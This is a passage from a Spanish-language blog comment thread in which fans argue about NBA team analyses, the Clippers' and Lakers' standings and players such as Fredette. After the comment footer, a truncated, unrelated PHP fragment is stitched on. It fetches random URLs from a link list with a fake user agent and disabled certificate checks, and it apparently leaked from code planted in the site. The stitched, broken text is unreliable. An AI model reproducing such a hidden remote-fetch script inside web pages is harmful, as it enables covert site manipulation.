    Y lo de Esteban con los Clippers es que está obsesionado con lo de su análisis. A veces nos pasan esas cosas, se nos mete en la cabeza una chorrada y si vemos que no tenemos razón aún se nos mete más en la cabeza. Es un poco obsesivo el tema, pero sus razones tendrá. Si Clippers acabase primero del Oeste y llegase a las finales o, incluso se llevase el anillo, a mí no me extrañaría nada. Y decir que el equipo es peor este año que el año pasado es el chiste del día. No me jodas…

      Citar

  20. Sancho88 dice:
    #20

    Ahora bien, no voy a negar que si a Fredette lo pones en un sistema de jugar con base distribuidor y dos muñecos abiertos, es un tío que para meter 2 o 3 triples y tener una media de 8 puntos o así puede valer, pero normalmente esos jugadores con un rol tan específico suelen ser buenos defensores, y este señor no lo es. Es que es tan sumamente irregular, tan malo en defensa, en IQ, en bote de balón, en pase, en todo, que solo tiene tiro de tres como Kapono, no puede defender a nadie… joder, de verdad, es que es penoso. Joder, si me he visto hasta summer leagues del cabrón, y ahí jugaba contra jugadores de la D-League, que es donde debería de estar a mi juicio.

      Citar

  21. Esteban dice:
    #21

    Sancho88:
    Y lo de Esteban con los Clippers es que está obsesionado con lo de su análisis. A veces nos pasan esas cosas, se nos mete en la cabeza una chorrada y si vemos que no tenemos razón aún se nos mete más en la cabeza. Es un poco obsesivo el tema, pero sus razones tendrá. Si Clippers acabase primero del Oeste y llegase a las finales o, incluso se llevase el anillo, a mí no me extrañaría nada. Y decir que el equipo es peor este año que el año pasado es el chiste del día. No me jodas…

    están en el puesto en que los ubique a la hora del análisis de mitad de temporada, ahora lo que pueda pasar es otro cantar, quizá Durat se rompa la pierna, lo mismo parker, howard o el que sea

    lo cierto es que el quinto puesto que les di es que tienen, al que no le gusta, lo siento por el, acierto A

    gracias

      Citar

  22. Denise dice:
    #22

    Sancho88:

    Y Deer, lo que digo de la nota de los análisis es por eso, que la nota de Lakers no va en sintonía con la clasificación y el pronóstico de victorias, y por ese motivo a mí me has puesto malas notas en otros análisis, por el decanaje de victorias/posisción, por el tema de no calibrar bien cómo iba a darse la temporada a nivel porcentajes/posiciones en conferencias. Por eso me quejo. Ni mucho menos me quejo de la nota de Kings ni de nada más. Es específicamente referido a eso. Me parece una nota demasiado alta para el análisis de Lakers, eso es todo. Si llegan a 30 victorias ya se pueden dar con un canto en los dientes. Denise pronosticó 39 y 10º, y van a ganar 30 y van a quedar los 15. Eso no se merece una B. Es mi opinión.

    ¿Pero esto que es??? ¿Por qué le dais tanta importancia a las notas? Que no nos van a dar una beca Erasmus por acertar….
    Y Sancho, tampoco soy adivino y los analisis que he hecho los hago presuponiendo que la plantilla esté sana al 100%, joer, que Lakers tiene ó ha tenido lesionado casi todo el año a Kobe, Blake, Farmar y Nash, y buena parte de la temporada a Nick Young, Xavier Henry y Gasol. Así es normal que vayan últimos del Oeste, pero sin lesiones, a dia de hoy llevarían unas 10 victorias mas mínimo.

    Sobre el polémico analisis de los Clippers, para mí es demasiado catastrofista con los Clippers y algunos jugadores, teniendo éstos un plantillón. Pero también es cierto que Esteban acabó acertando con lo de Jamison y Mullens; y los Clippers han tenido que tirar de agentes libres (Glen Davis, Turkoglu, Vujacic y ahora suena Granger) para intentar mejorar su equipo.

    Pero tios, no os tomeis las notas como algo personal…

      Citar

  23. Sancho88 dice:
    #23

    Joder, se le está dando demasiado bombo a una crítica. Vale, un B al análisis que no pasa nada joder. Parece que tenemos la regla o algo.

    Y Esteban, los Clippers son 4º según NBA.COM. Y ese es el puesto oficial, no el que tú te inventas. No sé si van a ganar la conferencia, pero creo que sí van a acabar por delante de Rockets que están demasiado inflados con un peor equipo que Clippers. Blazers también están en la pelea. En realidad hay 5 equipos en 4 victorias de diferencia peleando por el título del Oeste. Es un poco indiferente ahora mismo el puesto, porque dependiendo de si has jugado esta noche o mañana bajas o subes un escalón en la clasificación. Habrá que ver en un par de meses cómo acaba esto. Es posible que Phoenix se bajen de la nube para que los Grizzlies ocupen el último puesto del Oeste. No creo que Warriors y Dallas vayan fuera. Warriors porque están en una progresión muy positiva con todas sus piezas sanas excepto Lee que no creo que tarde mucho en regresar, y Dallas porque tienen un competidor magnifico llamado Nowitzki que no va a dejar que el equipo se relaje ni de coña. Puede que si se concentran y consiguen involucrar a Muhammad en el equipo titular, los Wolves por fin se conviertan en un contender. Les doy pocas opciones de conseguir la octava plaza ahora mismo, pero quién sabe, tampoco están lejísimos. Van a tene que remar mucho, eso sí.

    Lo que sí parece sentenciado son los 8 primeros del Este. Menudos desastres Pistons, Cavaliers y Knicks. De estar en casi todas las quinielas para jugar playoffs a no estar en casi ninguna. Qué lamentable. Melo debería escapar ya mismo de esa casa de grillos. Tiene una edad como para empezarse a preocupar por el anillo, y ahí donde está no lo va a ganar ni el año que viene, ni el próximo, ni el siguiente… y así sucesivamente. Como mucho va a poder rodar Django desencadenado con Felton de protagonista y Jr. Smith para las escenas de riesgo. No me quiero ni imaginar lo que habría disfrutado Smith hace unos años defendiendo a Iverson. No sabría ni por dónde empezar a hacerle putadas. Qué hago, le quito la cinta, le desato las zapatillas… no, espera, mejor cojo unas tijeras y le corto la movida esa del brazo… sería realmente feliz. Seguro que en el vestuario va robando objetos personales de ese tipo a los compañeros. Es un poco fetichista el tío

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>